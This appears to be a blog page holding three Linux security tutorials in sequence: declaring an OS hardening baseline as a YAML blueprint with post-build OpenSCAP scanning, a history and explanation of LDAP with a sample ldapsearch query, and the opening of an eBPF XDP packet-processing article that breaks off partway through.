Hardening Blueprint as Code — Declare Your OS Baseline in YAML

Reading Time: 6 minutes

OS Hardening as Code, Episode 2
Cloud AMI Security Risks · Linux Hardening as Code

Focus Keyphrase: Linux hardening as code
Search Intent: Informational
Meta Description: Stop relying on hardening runbooks that get skipped at 2am. Declare your Linux OS baseline as a YAML blueprint — and build images where skipping a step is structurally impossible. (155 chars)


TL;DR

  • A hardening runbook is a list of steps someone runs. A HardeningBlueprint YAML is a build artifact — if it wasn’t applied, the image doesn’t exist
  • Linux hardening as code means declaring your entire OS security baseline in a single YAML file and building it reproducibly across any provider
  • stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws either produces a hardened image or fails — there is no partial state
  • The blueprint includes: target OS/provider, compliance benchmark, Ansible roles, and per-control overrides with documented reasons
  • One blueprint file = one source of truth for your hardening posture, version-controlled and reviewable like any other infrastructure code
  • Post-build OpenSCAP scan runs automatically — the image only snapshots if it passes

The Problem: A Runbook That Gets Skipped Once Is a Runbook That Gets Skipped

Hardening runbook
       │
       ▼
  Human executes
  steps manually
       │
       ├─── 47 deployments: followed correctly
       │
       └─── 1 deployment at 2am: step 12 skipped
                    │
                    ▼
           Instance in production
           without audit logging,
           SSH password auth enabled,
           unnecessary services running

Linux hardening as code eliminates the human decision point. If the blueprint wasn’t applied, the image doesn’t exist.

EP01 showed that default cloud AMIs arrive pre-broken — unnecessary services, no audit logging, weak kernel parameters, SSH configured for convenience, not security. The obvious response is a hardening script. But a script run by a human is still a process step. It can be skipped. It can be done halfway. It can drift across different engineers who each interpret “run the hardening script” slightly differently.


Consider a production deployment from last year. The platform team had a solid CIS L1 hardening runbook — 68 steps, well-documented, followed consistently. Then a critical incident at 2am required three new instances to be deployed on short notice. The engineer on call ran the provisioning script and, under pressure, skipped the hardening step with the intention of running it the next morning.

They didn’t. The three instances stayed in production unhardened for six weeks before an automated scan caught them. Audit logging wasn’t configured. SSH was accepting password authentication. Two unnecessary services were running that weren’t in the approved software list.

Nothing was breached. But the finding went into the next compliance report as a gap, the team spent a week remediating, and the post-mortem conclusion was “we need better runbook discipline.”

That’s the wrong conclusion. The runbook isn’t the problem. The problem is that hardening was a process step instead of a build constraint.


What Linux Hardening as Code Actually Means

Linux hardening as code is the same principle as infrastructure as code applied to OS security posture: the desired state is declared in a file, the file is the source of truth, and the execution is deterministic and repeatable.

HardeningBlueprint YAML
         │
         ▼
  stratum build
         │
  ┌──────┴──────────────────┐
  │  Provider Layer          │
  │  (cloud-init, disk       │
  │   names, metadata        │
  │   endpoint per provider) │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  Ansible-Lockdown        │
  │  (CIS L1/L2, STIG —      │
  │   the hardening steps)   │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  OpenSCAP Scanner        │
  │  (post-build verify)     │
  └──────┬──────────────────┘
         │
         ▼
  Golden Image (AMI/GCP image/Azure image)
  + Compliance grade in image metadata

The YAML file is what you write. Stratum handles the rest.


The HardeningBlueprint YAML

The blueprint is the complete, auditable declaration of your OS security posture:

# ubuntu22-cis-l1.yaml
name: ubuntu22-cis-l1
description: Ubuntu 22.04 CIS Level 1 baseline for production workloads
version: "1.0"

target:
  os: ubuntu
  version: "22.04"
  provider: aws
  region: ap-south-1
  instance_type: t3.medium

compliance:
  benchmark: cis-l1
  controls: all

hardening:
  - ansible-lockdown/UBUNTU22-CIS
  - role: custom-audit-logging
    vars:
      audit_log_retention_days: 90
      audit_max_log_file: 100

filesystem:
  tmp:
    type: tmpfs
    options: [nodev, nosuid, noexec]
  home:
    options: [nodev]

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"
  - id: 5.2.4
    override: compliant
    reason: "SSH timeout managed by session manager policy, not sshd_config"

Each section is explicit:

target — which OS, which version, which provider. This is the only provider-specific section. The compliance intent below it is portable.

compliance — which benchmark and which controls to apply. controls: all means every CIS L1 control. You can also specify controls: [1.x, 2.x] to scope to specific sections.

hardening — which Ansible roles to run. ansible-lockdown/UBUNTU22-CIS is the community CIS hardening role. You can add custom roles alongside it.

controls — documented exceptions. Not suppressions — overrides with a recorded reason. This is the difference between “we turned off this control” and “this control is satisfied by an equivalent implementation, documented here.”
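The controls: [1.x, 2.x] scoping mentioned above reads naturally as prefix patterns over control IDs. Here is a minimal Python sketch of that matching logic — the pattern semantics are an assumption for illustration, not Stratum's documented behavior:

```python
# Hypothetical illustration of benchmark-control scoping — not Stratum's code.
# Assumption: "1.x" means "every control whose ID falls under section 1".

def control_in_scope(control_id: str, scope) -> bool:
    """Return True if control_id is selected by the blueprint's scope."""
    if scope == "all":
        return True
    for pattern in scope:
        section = pattern.removesuffix(".x")   # "1.x" -> "1", "5.2.x" -> "5.2"
        if control_id == section or control_id.startswith(section + "."):
            return True
    return False

# controls: [1.x, 5.2.x] would select these:
print(control_in_scope("1.1.2", ["1.x", "5.2.x"]))   # True  (section 1)
print(control_in_scope("5.2.4", ["1.x", "5.2.x"]))   # True  (section 5.2)
print(control_in_scope("3.1.1", ["1.x", "5.2.x"]))   # False (not in scope)
print(control_in_scope("2.1.1", "all"))              # True  (controls: all)
```

The point of prefix semantics is that scoping to a section automatically covers every sub-control added to that section in future benchmark revisions.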


Building the Image

# Validate the blueprint before building
stratum blueprint validate ubuntu22-cis-l1.yaml

# Build — this will take 15-20 minutes
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws

# Output:
# [15:42:01] Launching build instance...
# [15:42:45] Running ansible-lockdown/UBUNTU22-CIS (144 tasks)...
# [15:51:33] Running custom-audit-logging role...
# [15:52:11] Running post-build OpenSCAP scan (benchmark: cis-l1)...
# [15:54:08] Grade: A (98/100 controls passing)
# [15:54:09] 2 controls overridden (documented in blueprint)
# [15:54:10] Creating AMI snapshot: ami-0a7f3c9e82d1b4c05
# [15:54:47] Done. AMI tagged with compliance grade: cis-l1-A-98

If the post-build scan comes back below a configurable threshold, the build fails — no AMI is created. The instance is terminated. The image does not exist.

That is the structural guarantee. You cannot skip a build step at 2am because at 2am you’re calling stratum build, not running steps manually.


The Control Override Mechanism

The override mechanism is what separates this from checkbox compliance.

Every security benchmark has controls that conflict with how production environments actually work. CIS L1 recommends /tmp on a separate partition. Many cloud instances use tmpfs with equivalent nodev, nosuid, noexec mount options. The intent of the control is satisfied. The literal implementation differs.

Without an override mechanism, you have two bad options: fail the scan (noisy, meaningless), or configure the scanner to ignore the control (undocumented, invisible to auditors).

The blueprint’s controls section gives you a third option: record the override, document the reason, and let the scanner count it as compliant. The SARIF output and the compliance grade both reflect the documented state.

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"

This appears in the build log, in the SARIF export, and in the image metadata. An auditor reading the output sees: control 1.1.2 — compliant, documented exception, reason recorded. Not: control 1.1.2 — ignored.
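The accounting behind “Grade: A (98/100 controls passing), 2 controls overridden” can be sketched in a few lines. This is a toy Python illustration; the data shapes and grade thresholds are assumptions, not Stratum's implementation:

```python
# Hypothetical sketch: fold documented overrides into a compliance grade.
# Data shapes and thresholds are assumptions, not Stratum's actual code.

scan_results = {            # raw OpenSCAP outcome per control (abbreviated)
    "1.1.2": "fail",        # literal check fails: /tmp is not a partition
    "5.2.4": "fail",
    "4.1.1": "pass",
    "5.3.1": "pass",
}

overrides = {               # the blueprint's controls: section
    "1.1.2": "tmpfs /tmp implemented via systemd unit — equivalent control",
    "5.2.4": "SSH timeout managed by session manager policy, not sshd_config",
}

def effective_status(control_id, raw):
    """An overridden control counts as passing, but the reason travels with it."""
    if raw == "pass":
        return "pass"
    if control_id in overrides:
        return "pass (override: " + overrides[control_id] + ")"
    return "fail"

statuses = {cid: effective_status(cid, raw) for cid, raw in scan_results.items()}
passing = sum(1 for s in statuses.values() if s.startswith("pass"))
score = round(100 * passing / len(statuses))
grade = "A" if score >= 95 else "B" if score >= 85 else "F"  # assumed thresholds
print(f"Grade: {grade} ({passing}/{len(statuses)} controls passing)")
# Grade: A (4/4 controls passing)
```

The key property: an override changes the count, but never erases the reason. The reason string is what an auditor reads.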


What the Blueprint Gives You That a Script Doesn’t

                                 Hardening script            HardeningBlueprint YAML
                                 ────────────────            ───────────────────────
Version-controlled               Possible but not enforced   Always — it’s a file
Auditable exceptions             Typically not               Built-in override mechanism
Post-build verification          Manual or none              Automatic OpenSCAP scan
Image exists only if hardened    No                          Yes — build fails if scan fails
Multi-cloud portability          Requires separate scripts   Provider flag, same YAML
Drift detection                  Not possible                Rescan instance against original grade
Skippable at 2am                 Yes                         No — you’d have to change the build process

The last row is the one that matters. A script is skippable because there’s a human in the loop. A blueprint is a build artifact — you can’t deploy the image without the blueprint having been applied, because the image is what the blueprint produces.


Validating a Blueprint Before Building

# Syntax and schema validation
stratum blueprint validate ubuntu22-cis-l1.yaml

# Dry-run — show what Ansible tasks will run, what controls will be checked
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws --dry-run

# Show all available controls for a benchmark
stratum blueprint controls --benchmark cis-l1 --os ubuntu --version 22.04

# Show what a specific control checks
stratum blueprint controls --id 1.1.2 --benchmark cis-l1

The dry-run output shows every Ansible task that will run, every OpenSCAP check that will fire, and flags any controls that might conflict with the provider environment before you’ve launched a build instance.


Production Gotchas

Build time is 15–25 minutes. Ansible-Lockdown applies 144+ tasks for CIS L1. Build this into your pipeline timing — don’t expect golden images in 3 minutes.

Cloud-init ordering matters. On AWS, certain hardening steps (sysctl tuning, PAM configuration) interact with cloud-init. The Stratum provider layer handles sequencing — but if you add custom hardening roles, test the cloud-init interaction explicitly.

Some CIS controls conflict with managed service requirements. AWS Systems Manager Session Manager requires specific SSH configuration. RDS requires specific networking settings. Use the controls override section to document these — don’t suppress them silently.

Kernel parameter hardening requires a reboot. Controls in the 3.x (network parameters) and 1.5.x (kernel modules) sections apply sysctl changes that take effect on reboot. The Stratum build process reboots the instance before the OpenSCAP scan — don’t skip the reboot if you’re building manually.


Key Takeaways

  • Linux hardening as code means the blueprint YAML is the build artifact — the image either exists and is hardened, or it doesn’t exist
  • The controls override mechanism is the difference between undocumented suppressions and auditable, reasoned exceptions
  • Post-build OpenSCAP scan runs automatically — a failing grade blocks image creation
  • One blueprint file is portable across providers (EP03 covers this): the compliance intent stays in the YAML, the cloud-specific details go in the provider layer
  • Version-controlling the blueprint gives you a complete history of what your OS security posture was at any point in time — the same way Terraform state tracks infrastructure

What’s Next

One blueprint, one provider. This episode showed that the skip-at-2am problem is solved when hardening is a build artifact rather than a process step.

What it didn’t address: what happens when you expand to a second cloud. GCP uses different disk names. Azure cloud-init fires in a different order. Metadata endpoint behavior and authentication differ across providers. If you maintain separate hardening scripts per cloud, they drift within a month.

EP03 covers multi-cloud OS hardening: the same blueprint, six providers, no drift.

Next: multi-cloud OS hardening — one blueprint for AWS, GCP, and Azure

Get EP03 in your inbox when it publishes → linuxcent.com/subscribe

What Is LDAP — and Why It Was Invented to Replace Something Worse

Reading Time: 9 minutes

The Identity Stack, Episode 1
EP01 → EP02: LDAP Internals → EP03 → …

Focus Keyphrase: what is LDAP
Search Intent: Informational
Meta Description: LDAP solved 1980s authentication chaos and still powers enterprise logins today. Learn what it replaced, how it works, and why it’s still in your stack. (155 chars)


TL;DR

  • LDAP (Lightweight Directory Access Protocol) is a protocol for reading and writing directory information — most commonly, who is allowed to do what
  • It was built in 1993 as a “lightweight” alternative to X.500/DAP, which ran over the full OSI stack and was impossible to deploy on anything but mainframe hardware
  • Before LDAP, every server had its own /etc/passwd — 50 machines meant 50 separate user databases, managed manually
  • NIS (Network Information Service) was the first attempt to centralize this — it worked, then became a cleartext-credentials security liability
  • LDAP v3 (RFC 2251, 1997) is the version still in production today — 27 years of backwards compatibility
  • Everything you use today — Active Directory, Okta, Entra ID — is built on top of, or speaks, LDAP

The Big Picture: 50 Years of “Who Are You?”

1969–1980s   /etc/passwd — per-machine, no network auth
     │        50 servers = 50 user databases, managed manually
     │
     ▼
1984         Sun NIS / Yellow Pages — first centralized directory
     │        broadcast-based, no encryption, flat namespace
     │        Revolutionary for its era. A liability by the 1990s.
     │
     ▼
1988         X.500 / DAP — enterprise-grade directory services
     │        OSI protocol stack. Powerful. Impossible to deploy.
     │        Mainframe-class infrastructure required just to run it.
     │
     ▼
1993         RFC 1487 — LDAP v1
     │        Tim Howes, University of Michigan.
     │        Lightweight. TCP/IP. Actually deployable.
     │
     ▼
1997         RFC 2251 — LDAP v3
     │        SASL authentication. TLS. Controls. Referrals.
     │        The version still in production today.
     │
     ▼
2000s–now    Active Directory, OpenLDAP, 389-DS, FreeIPA
             Okta, Entra ID, Google Workspace
             LDAP DNA in every identity system on the planet.

What is LDAP? It’s the protocol that solved one of the most boring and consequential problems in computing: how do you know who someone is, across machines, at scale, without sending their password in cleartext?


The World Before LDAP

Before you understand why LDAP was invented, you need to feel the problem it solved.

Every Unix machine in the 1970s and 1980s managed its own users. When you created an account on a server, your username, UID, and hashed password went into /etc/passwd on that machine. Another machine had no idea you existed. If you needed access to ten servers, an administrator created ten separate accounts — manually, one by one. When you changed your password, each account had to be updated separately.

For a university with 200 machines and 10,000 students, this was chaos. For a company with offices in three cities, it was a full-time job for multiple sysadmins.

Machine A           Machine B           Machine C
/etc/passwd         /etc/passwd         /etc/passwd
vamshi:x:1001       (vamshi unknown)    vamshi:x:1004
alice:x:1002        alice:x:1001        alice:x:1003
bob:x:1003          bob:x:1002          (bob unknown)

Same people, different UIDs, different machines, no central truth.
File permissions become meaningless when UID 1001 means
different users on different hosts.

For every new hire, an admin logged in to every machine and ran useradd. When someone left, you hoped whoever ran the offboarding remembered all the machines. Most organizations didn’t know their own attack surface because there was no single place to look.


Sun NIS: The First Attempt at Centralization

Sun Microsystems released NIS (Network Information Service) in 1984, originally called Yellow Pages — a name they had to drop after a trademark dispute with British Telecom. The idea was elegant: one server holds the authoritative /etc/passwd (and /etc/group, /etc/hosts, and a dozen other maps), and client machines query it instead of reading local files.

For the first time, you could create an account once and have it work across your entire network. For a generation of Unix administrators, NIS was liberating.

       NIS Master Server
       /var/yp/passwd.byname
              │
    ┌─────────┼──────────┐
    ▼         ▼          ▼
 Client A   Client B   Client C
 (query NIS — no local /etc/passwd needed)

NIS worked well — until it didn’t. The failure modes were structural:

No encryption. NIS responses were cleartext UDP. An attacker on the same network segment could capture the full password database with a packet sniffer. In 1984, “the network” meant a trusted corporate LAN. By the mid-1990s, it meant ethernet segments that included lab workstations, and the assumptions no longer held.

Broadcast-based discovery. NIS clients found servers by broadcasting on the local network. This worked on a single flat ethernet. It failed completely across routers, across buildings, and across WAN links. Multi-site organizations ended up running separate NIS domains with no connection between them — which partially defeated the purpose.

Flat namespace. NIS had no organizational hierarchy. One domain. Everything flat. You couldn’t have engineering and finance as separate administrative units. You couldn’t delegate user management to a department. One person — usually one overworked sysadmin — managed the whole thing.

UIDs had to match across all machines. If alice was UID 1002 on one server but UID 1001 on another, NFS file ownership became wrong. NIS enforced consistency, but onboarding a new machine into an existing network required manually auditing UID conflicts across the entire directory. Get one wrong and files end up owned by the wrong person.
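The UID-mismatch failure is easy to demonstrate with the example data from the /etc/passwd diagram above: NFS stores ownership as a numeric UID, and each host resolves that number through its own passwd map. A small Python sketch:

```python
# Why per-host user databases break NFS: ownership is a numeric UID,
# and each host resolves that number through its own local map.
# (Same example data as the Machine A / Machine C diagram above.)
passwd_host_a = {1001: "vamshi", 1002: "alice", 1003: "bob"}
passwd_host_c = {1003: "alice", 1004: "vamshi"}

nfs_file_owner_uid = 1003   # file written on host A by bob

print("host A sees owner:", passwd_host_a[nfs_file_owner_uid])   # bob
print("host C sees owner:", passwd_host_c[nfs_file_owner_uid])   # alice
```

Same file, same UID on disk, two different "owners" depending on which host you ask. That is the inconsistency NIS had to police manually.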

NIS worked for thousands of installations from 1984 to the mid-1990s. It also ended careers when it failed. What the industry needed was a hierarchical, structured, encrypted, scalable directory service.


X.500 and DAP: The Right Idea, Wrong Protocol

The OSI (Open Systems Interconnection) standards body had an answer: X.500 directory services. X.500 was comprehensive, hierarchical, globally federated. The ITU-T published the standard in 1988, and it looked like exactly what enterprises needed.

X.500 Directory Information Tree (DIT)
              c=US                   ← country
                │
         o=University                ← organization
                │
         ┌──────┴──────┐
     ou=CS           ou=Physics      ← organizational units
         │
     cn=Tim Howes                    ← common name (person)
     telephoneNumber: +1-734-...
     mail: [email protected]

This data model — the hierarchy, the object classes, the distinguished names — is exactly what LDAP inherited. The DIT and the cn= and ou= notation in every LDAP query you’ve ever read came straight from X.500; the dc= domain-component convention arrived later (RFC 2247) to map DNS names into the same tree.

The problem was DAP: the Directory Access Protocol that X.500 used to communicate.

DAP ran over the full OSI protocol stack. Not TCP/IP — OSI. Seven layers, all of which required specialized software that in 1988 only mainframe and minicomputer vendors had implemented. A university department wanting to run X.500 needed hardware and software licenses that cost as much as a small car. The vast majority of workstations couldn’t speak OSI at all.

The data model was sound. The transport was impractical.

X.500 / DAP (1988)              LDAP v1 (1993)
──────────────────              ──────────────
Full OSI stack (7 layers)  →    TCP/IP only
Mainframe-class hardware   →    Any Unix box with a TCP stack
$50,000+ deployment cost   →    Free (reference implementation)
Vendor-specific OSI impl.  →    Standard socket API
Zero internet adoption     →    Universities deployed immediately

The Invention: LDAP at the University of Michigan

Tim Howes was at the University of Michigan in the early 1990s. The university was running X.500 for its directory — faculty, staff, student contact information, credentials. The data model was good. The protocol was the problem.

His insight, working with colleagues Wengyik Yeong and Steve Kille: strip X.500 down to what actually needs to function over a TCP/IP connection. Keep the hierarchical data model. Throw away the OSI transport. The result was the Lightweight Directory Access Protocol.

RFC 1487, published July 1993, described LDAP v1. It preserved the X.500 directory information model — the hierarchy, the object classes, the distinguished name format — and mapped it onto a protocol that could run over a simple TCP socket on port 389.

No specialized hardware. No OSI. If you had a Unix machine and TCP/IP, you could run LDAP. By 1993, that meant virtually every workstation and server in every university and most enterprises.

The University of Michigan deployed it immediately. Within two years, organizations across the internet were running the reference implementation.

LDAP v2 (RFC 1777, 1995) cleaned up the protocol. LDAP v3 (RFC 2251, 1997) is the version in production today — adding SASL authentication (which enables Kerberos integration), TLS support, referrals for federated directories, and extensible controls for server-side operations. The RFC that standardized the internet’s primary identity protocol is 27 years old and still running.


What LDAP Actually Is

LDAP is a client-server protocol for reading and writing a directory — a structured, hierarchical database optimized for reads.

Every entry in the directory has a Distinguished Name (DN) that describes its position in the hierarchy, and a set of attributes defined by its object classes. A person entry looks like this:

dn: cn=vamshi,ou=engineers,dc=linuxcent,dc=com
objectClass: inetOrgPerson
objectClass: posixAccount
cn: vamshi
uid: vamshi
uidNumber: 1001
gidNumber: 1001
homeDirectory: /home/vamshi
loginShell: /bin/bash
mail: vamshi@linuxcent.com

The DN reads right-to-left: domain linuxcent.com (dc=linuxcent,dc=com) → organizational unit engineers → common name vamshi. Every entry in the directory has a unique path through the tree — there’s no ambiguity about which vamshi you mean.
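That right-to-left reading can be made concrete in a few lines of Python. This is a deliberately naive sketch: real DN parsers handle escaped commas and multi-valued RDNs per RFC 4514, which this ignores.

```python
# Minimal DN parsing sketch — ignores RFC 4514 escaping rules on purpose.

def dn_path(dn: str):
    """Split a DN into RDNs and return the tree path, root first."""
    rdns = [rdn.strip() for rdn in dn.split(",")]
    return list(reversed(rdns))   # DNs read right-to-left: the root is last

path = dn_path("cn=vamshi,ou=engineers,dc=linuxcent,dc=com")
print(" -> ".join(path))
# dc=com -> dc=linuxcent -> ou=engineers -> cn=vamshi
```

Walking the reversed list is exactly walking the DIT from root to leaf.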

LDAP defines eight operations: Bind (authenticate), Search, Add, Modify, Delete, ModifyDN (rename), Compare, and Abandon. Most of what a Linux authentication system does with LDAP reduces to two: Bind (prove you are who you say you are) and Search (tell me everything you know about this user).

When your Linux machine authenticates an SSH login against LDAP:

1. User types password
2. PAM calls pam_sss (or pam_ldap on older systems)
3. SSSD issues a Bind to the LDAP server: "I am cn=vamshi, and here is my credential"
4. LDAP server verifies the bind → success or failure
5. SSSD issues a Search: "give me the posixAccount attributes for uid=vamshi"
6. LDAP returns uidNumber, gidNumber, homeDirectory, loginShell
7. PAM creates the session with those attributes

The entire login flow is two LDAP operations: one Bind, one Search.
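The seven-step flow above collapses into two function calls. Here is a toy in-memory stand-in for the directory, to make the Bind-then-Search shape concrete — this is an illustration, not a real LDAP client, and real servers store salted hashes rather than cleartext passwords:

```python
# Toy in-memory "directory" illustrating the two-operation login flow.
# Not a real LDAP client; real servers never store cleartext passwords.

DIRECTORY = {
    "cn=vamshi,ou=engineers,dc=linuxcent,dc=com": {
        "password": "s3cret",          # stand-in for the stored credential
        "uidNumber": 1001, "gidNumber": 1001,
        "homeDirectory": "/home/vamshi", "loginShell": "/bin/bash",
    }
}

def bind(dn, password):
    """Operation 1 (Bind): prove you are who you say you are."""
    entry = DIRECTORY.get(dn)
    return entry is not None and entry["password"] == password

def search(dn, attributes):
    """Operation 2 (Search): fetch the posixAccount attributes PAM needs."""
    entry = DIRECTORY[dn]
    return {attr: entry[attr] for attr in attributes}

dn = "cn=vamshi,ou=engineers,dc=linuxcent,dc=com"
if bind(dn, "s3cret"):
    session = search(dn, ["uidNumber", "gidNumber", "homeDirectory", "loginShell"])
    print("session created:", session)
```

Everything SSSD adds on top — caching, failover, Kerberos — is optimization and hardening around this same two-call core.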


Try It Right Now

You don’t need to set up an LDAP server to run your first query. There’s a public test LDAP directory at ldap.forumsys.com:

# Query a public LDAP server — no setup required
ldapsearch -x \
  -H ldap://ldap.forumsys.com \
  -b "dc=example,dc=com" \
  -D "cn=read-only-admin,dc=example,dc=com" \
  -w readonly \
  "(objectClass=inetOrgPerson)" \
  cn mail uid

# What you get back (abbreviated):
# dn: uid=tesla,dc=example,dc=com
# cn: Tesla
# mail: [email protected]
# uid: tesla
#
# dn: uid=einstein,dc=example,dc=com
# cn: Albert Einstein
# mail: [email protected]
# uid: einstein

Decode what you just ran:

  • -x — simple authentication (username/password bind, not Kerberos/SASL)
  • -H ldap://ldap.forumsys.com — the LDAP server URI, port 389
  • -b "dc=example,dc=com" — the base DN, the top of the subtree to search
  • -D "cn=read-only-admin,dc=example,dc=com" — the bind DN (who you’re authenticating as)
  • -w readonly — the bind password
  • "(objectClass=inetOrgPerson)" — the search filter: return entries that are people
  • cn mail uid — the attributes to return (default returns all)

That’s a live LDAP query returning real directory entries from a server running RFC 2251 — the same protocol Tim Howes designed in 1993.

On your own Linux system, if you’re joined to AD or LDAP, you can query it the same way with your domain credentials.


Why It Never Went Away

LDAP v3 was finalized in 1997. In 2024, it’s still the protocol every enterprise directory speaks. Why?

Because it became the lingua franca of enterprise identity before any replacement existed. Every application that needs to authenticate users — VPN concentrators, mail servers, network switches, web applications, HR systems — implemented LDAP support. Every directory service Microsoft, Red Hat, Sun, and Novell shipped stored data in an LDAP-accessible tree.

When Microsoft built Active Directory in 1999, they built it on top of LDAP + Kerberos. When your Linux machine joins an AD domain, it speaks LDAP to enumerate users and groups, and Kerberos to verify credentials. When Okta or Entra ID syncs with your on-premises directory, it uses LDAP Sync (or a modern protocol that maps directly to LDAP semantics).

The protocol is old. The ecosystem built on top of it is so deep that replacing LDAP would mean simultaneously replacing every enterprise application that depends on it. Nobody has done that. Nobody has had to.

What happened instead is the stack got taller. LDAP at the bottom, Kerberos for network authentication, SSSD as the local caching daemon, PAM as the Linux integration layer, SAML and OIDC at the top for web-based federation. The directory is still LDAP. The interfaces above it evolved.

That full stack — from the directory at the bottom to Zero Trust at the top — is what this series covers.


⚠ Common Misconceptions

“LDAP is an authentication protocol.” LDAP is a directory protocol. It stores identity information and can verify credentials (via Bind). Authentication in modern stacks is typically Kerberos or OIDC — LDAP provides the directory backing it.

“LDAP is obsolete.” LDAP is the storage layer for Active Directory, OpenLDAP, 389-DS, FreeIPA, and every enterprise IdP’s on-premises sync. It is ubiquitous. What’s changed is the interface layer above it.

“You need Active Directory to run LDAP.” Active Directory uses LDAP. OpenLDAP, 389-DS, FreeIPA, and Apache Directory Server are all standalone LDAP implementations. You can run a directory without Microsoft.

“LDAP and LDAPS are different protocols.” LDAP is the protocol. LDAPS is LDAP over TLS on port 636. StartTLS is LDAP on port 389 with an in-session upgrade to TLS. Same protocol, different transport security.


Framework Alignment

  • CISSP Domain 5: Identity and Access Management — LDAP is the foundational directory protocol for centralized identity stores, the base layer of every enterprise IAM stack
  • CISSP Domain 4: Communications and Network Security — port 389 (LDAP), 636 (LDAPS), 3268/3269 (AD Global Catalog); transport security decisions affect every directory deployment
  • CISSP Domain 3: Security Architecture and Engineering — DIT hierarchy, schema design, replication topology; directory structure is an architectural security decision
  • NIST SP 800-63B — LDAP as a credential service provider (CSP) backing enterprise authenticators

Key Takeaways

  • LDAP was invented to solve a real, painful problem: the authentication chaos that NIS couldn’t fix and X.500/DAP was too expensive to deploy
  • It inherited the right thing from X.500 (the hierarchical data model) and replaced the right thing (the impractical OSI transport with TCP/IP)
  • NIS was the predecessor that worked until it didn’t — its failure modes (no encryption, flat namespace, broadcast discovery) are exactly what LDAP was designed to fix
  • LDAP v3 (RFC 2251, 1997) is still the production standard — 27 years later
  • Active Directory, OpenLDAP, FreeIPA, Okta, Entra ID — every enterprise identity system either runs LDAP or speaks it
  • The full authentication stack is deeper than LDAP: the next 12 episodes peel it apart layer by layer

What’s Next

EP01 stayed at the design level — the problem, the predecessor failures, the invention, the data model.

EP02 goes inside the wire. The DIT structure, DN syntax, object classes, schema, and the BER-encoded bytes that actually travel from the server to your authentication daemon. Run ldapsearch against your own directory and read every line of what comes back.

Next: LDAP Internals: The Directory Tree, Schema, and What Travels on the Wire

Get EP02 in your inbox when it publishes → linuxcent.com/subscribe

XDP — Packets Processed Before the Kernel Knows They Arrived

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 7
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP


TL;DR

  • XDP fires before sk_buff allocation — the earliest possible kernel hook for packet processing
    (sk_buff = the kernel’s socket buffer — every normal packet requires one to be allocated, which adds up fast at scale)
  • Three modes: native (in-driver, full performance), generic (fallback, no perf gain), offloaded (NIC ASIC)
  • XDP context is raw packet bytes — no socket, no cgroup, no pod identity; handle non-IP traffic explicitly
  • Every pointer dereference requires a bounds check against data_end — the verifier enforces this
  • BPF_MAP_TYPE_LPM_TRIE is the right map type for IP prefix blocklists — handles /32 hosts and CIDRs together
  • XDP metadata area enables coordination with TC programs — classify at XDP speed, enforce with pod context at TC

XDP fires before sk_buff allocation — the earliest possible kernel hook, and the reason iptables rules can be technically correct while still burning CPU at high packet rates. I had iptables DROP rules installed and working during a SYN flood. Packets were being dropped. CPU was still burning at 28% software interrupt time. The rules weren’t wrong. The hook was in the wrong place.


A client’s cluster was under a SYN flood — roughly 1 million packets per second from a rotating set of source IPs. We had iptables DROP rules installed within the first ten minutes, blocklist updated every 30 seconds as new source ranges appeared. The flood traffic dropped in volume. But node CPU stayed high. The %si column in top — software interrupt time — was sitting at 25–30%.

%si in top is the percentage of CPU time spent in software-interrupt (softirq) context — the kernel-level packet processing that happens separately from your application’s CPU usage. On a quiet managed cluster (EKS, GKE) this is usually under 1%. Under a packet flood, high %si means the kernel is burning cycles just receiving packets, before your workloads run at all. It’s the metric that tells you the problem is below the application layer.

I didn’t understand why. The iptables rules were matching. Packets were being dropped. Why was the CPU still burning?

The answer is where in the kernel the drop was happening. iptables fires inside the netfilter framework — after the kernel has already allocated an sk_buff for the packet, done DMA from the NIC ring buffer, and traversed several netfilter hooks.

netfilter is the Linux kernel subsystem that handles packet filtering, NAT, and connection tracking. iptables is the userspace CLI that writes rules into it. At high packet rates, the cost isn’t the rule match — it’s the kernel work that happens before the rule is evaluated. At 1 million packets per second, the allocation cost alone is measurable. The attack was low-bandwidth in network terms, but fast enough to keep the kernel memory allocator and netfilter traversal continuously busy.

XDP fires before any of that. Before sk_buff. Before routing. Before the kernel network stack has touched the packet at all. A DROP decision at the XDP layer costs one bounds check and a return value. Nothing else.
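What does that one bounds check look like? In a real XDP program it is C, and the verifier rejects any packet load that is not preceded by a check against data_end. The same discipline can be sketched over a raw byte buffer in Python. This is an illustration of the logic only, not loadable BPF, and the blocklist here is a plain set rather than a BPF map:

```python
import struct

# Userspace sketch of XDP-style packet handling: bounds-check, parse, decide.
# Illustration only — a real XDP program is C, verified and loaded into the kernel.
DROP, PASS = "XDP_DROP", "XDP_PASS"
ETH_HLEN, ETH_P_IP = 14, 0x0800

def xdp_style_decision(pkt: bytes, blocked_src: set) -> str:
    """Mimic an XDP blocklist program's control flow."""
    # Bounds check 1: full Ethernet header present?
    # (the C equivalent: if (data + ETH_HLEN > data_end) return XDP_DROP;)
    if len(pkt) < ETH_HLEN:
        return DROP
    (ethertype,) = struct.unpack_from("!H", pkt, 12)
    if ethertype != ETH_P_IP:
        return PASS                      # non-IP traffic: let the stack handle it
    # Bounds check 2: minimal 20-byte IPv4 header present?
    if len(pkt) < ETH_HLEN + 20:
        return DROP
    src = pkt[ETH_HLEN + 12 : ETH_HLEN + 16]   # IPv4 source address bytes
    return DROP if src in blocked_src else PASS

# A minimal Ethernet+IPv4 frame with source 203.0.113.9 (TEST-NET-3)
frame = (bytes(12) + struct.pack("!H", ETH_P_IP)   # MACs + ethertype
         + bytes(12) + bytes([203, 0, 113, 9]) + bytes(4))  # IPv4 hdr fields
print(xdp_style_decision(frame, {bytes([203, 0, 113, 9])}))   # XDP_DROP
```

Note the explicit handling of non-IP traffic: at the XDP layer there is no guarantee the packet is even IPv4, so ARP and anything else must be passed or dropped deliberately.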

Quick Check: Is XDP Running on Your Cluster?

Before the data path walkthrough — a two-command check you can run right now on any cluster node:

# SSH into a worker node, then:
bpftool net list

On a Cilium-managed node, you’ll see something like:

eth0 (index 2):
